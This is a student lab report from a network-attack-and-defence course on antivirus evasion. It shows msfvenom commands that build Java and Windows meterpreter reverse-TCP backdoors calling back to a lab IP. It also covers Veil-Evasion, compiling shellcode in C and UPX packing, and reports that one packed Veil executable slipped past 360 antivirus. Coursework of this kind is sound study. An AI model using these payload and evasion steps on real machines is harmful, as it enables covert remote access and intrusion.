20155217《网络对抗》Exp03 免杀原理与实践
20155217《网络对抗》Exp03 免杀原理与实践
实践内容
- 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧。
- 通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图)。
- 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。
正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
- 首先先把上次的后门放在virscan.org上检测一下(有些需要重命名才能检测)。

- 发现查杀率还是比较高的。
- 尝试使用msf进行多次编码,发现编码次数再多,也没什么实质性的变化,均不能实现免杀。
- 生成jar
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.199.137 lport=5217 x> ydshell.jar - 下载并安装
veil-evasion。这个过程出现的各种错误让人崩溃= =,这里推荐安装教程和使用教程!是亲亲杜可欣同学推荐的,用过的人都说好!

- 打开
tools/Veil/,运行Veil.py成功。

- veil启动后,依次输入:
use python/meterpreter/rev_tcpset LHOST 192.168.199.137set LPORT 5217generate- Please enter the base name for output files (default is 'payload'):
veil5217 - 选择
1
- 发现并不能生成Python语言的可执行文件QAQ。


- 于是和很多同学一样,换了一个语言
use c/meterpreter/rev_tcp.py,重复上面的操作,发现很是ok,可以生成可执行文件啦。

- 把Veil生成的小程序放在Win10下,被马上发现了= =。

- 再把它放在网站上扫描一下,结果...唉。

利用shellcode编程实现免杀
- 首先关闭win10防火墙和杀毒软件,ping通,可以回连成功。

- 使用
msf生成一个C语言格式的shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.137 LPORT=5217 -f

- 尝试使用交叉编译,但结果无法运行。



- 在win10中下载VS并安装,选择
桌面C++开发,继续安装。 - 把shellcode写成
c文件,编译生成的exe文件存放在Debug文件夹里。

- 尝试回连,成功。

- 生成的exe文件放在网站上检测一下(竟然只是警惕而已哎)。

通过组合应用各种技术实现恶意代码免杀
- 压缩壳UPX压缩VS生成的exe文件
upx 5217shellcode.exe -o 5217shellcode.upxed.exe

- 加壳后查杀率竟然提高了!!等等,这不就是传说中的画蛇添足了嘛,摆明了告诉人家:我是穿了壳的恶意代码,不要来查杀我哦!
- 此时打开了我的360杀毒以及安全管家,立马被清除了= = 。
- 说明
shellcode Vs编译+压缩壳实现不了免杀。 - 于是我尝试了对在Veil下产生的
exe文件进行压缩壳操作。


- 360杀毒竟然没有发现!稀里糊涂莫名其妙地实现了免杀??
基础问题回答
- 杀软是如何检测出恶意代码的?
分析恶意程序的行为特征,分析其代码流将其性质归类于恶意代码。
- 免杀是做什么?
使恶意代码避免被查杀,也就是要掩盖恶意代码的特征。
- 免杀的基本方法有哪些?
- 二进制的免杀(无源码),只能通过通过修改asm代码/二进制数据/其他数据来完成免杀。
- 有源码的免杀,可以通过修改源代码来完成免杀,也可以结合二进制免杀的技术。
离实战还缺些什么技术或步骤?
现在每台计算机都至少装有一个防火墙或杀毒软件进行定期的查杀清理,成功的概率会越来越小。另外,这次实现免杀不具有普适性,说实话,我自己也感到有些不可思议。
实践总结与体会
一定要多问同学!一定要多问同学!一定要多问同学!重要的事情说三遍。像这次的免杀方法,少不了同学们的集思广益,还有这次的veil下载安装,如果没有同学的帮助,指不定我还在哪里走着弯路呢!
20155217《网络对抗》Exp03 免杀原理与实践的更多相关文章
- 2018-2019-2 20165205 网络攻防Exp3免杀原理与实践
2018-2019-2 20165205 网络攻防Exp3免杀原理与实践 一.实践内容 1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用 ...
- 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...
- 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...
- 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...
- 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...
- 2018-2019-2 网络对抗技术 20165239Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践 win10 ip地址 192.168.18.1 fenix ip地址为 192.168.18.128 (1)杀软是如何 ...
- 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践
2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...
- 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...
随机推荐
- Vue -- vue-cli(vue脚手架) npm run build打包优化
这段时间公司新项目立项,开发组选用 Vue2.0 进行开发.当然也就一并用到 vue cli 进行自动化构建.结果在基础版本开发完成后,用 npm run build 命令打包上线时,发现以下几个问题 ...
- 大数据【七】HBase部署
接着前面的Zookeeper部署之后,现在可以学习HBase了. HBase是基于Hadoop的开源分布式数据库,它以Google的BigTable为原型,设计并实现了具有高可靠性.高性能.列存储.可 ...
- [Android] 状态栏的一些认识
前段时间遇到几个关于状态栏的问题,又了解了一下状态栏相关的知识,现在做一下记录. 本文地址:http://www.cnblogs.com/rossoneri/p/4316343.html 前戏和问题 ...
- Mac配置SDK+JDK环境
1.打开默认终端设备,编辑.bash_profile文件,命令:vi .bash_profile 2.执行,打开文件,编辑,配置环境命令如下: ①JDK环境:export JAVA_HOME=/lib ...
- 创建Filter类
1.Filter可认为是servlet的一种“加强版”,它主要用于对用户请求进行预处理,也可以对HttpServletresponse进行后处理,是个典型的处理链.Filter也可对用户请求生成响应, ...
- Python字符串和编码
在最早的时候只有127个字符被编码到计算机里,也就是大小写英文字母.数字和一些符号,这个编码被成为ASCII编码. 但是要处理中文显然一个字节是不够的,至少需要两个字节,而且还不能和ASCII编码冲突 ...
- 脚本设置IP bat 命令行设置自动获取IP和固定IP
由于办公室网络需要固定IP和DNS才能上网, 在连接公共网络或者家里又需要自动获取IP和DNS才能上网. 频繁手动切换很麻烦,就搞了两个脚本一键设置. 1.新建文本文件, 命名为固定IP.bat 复制 ...
- 【转载】Please configure Android Sdk(android studio)解决办法
https://blog.csdn.net/u011622280/article/details/79005453 studio就报Please configure Android Sdk,重启and ...
- C Programming vs. Java Programming
Thing C Java type of language function oriented object oriented basic programming unit function clas ...
- 【爬坑】Vim 文档加密 & 解密
0. 说明 在 Vim 使用过程中,最后保存的时候输入了 :X ,提示输入密码,输完密码发现以前没遇到类似情况. 有时候最后保存那会儿默认大写. 在网上一查发现原来给文件加密了,就顺带搜索怎么取消密 ...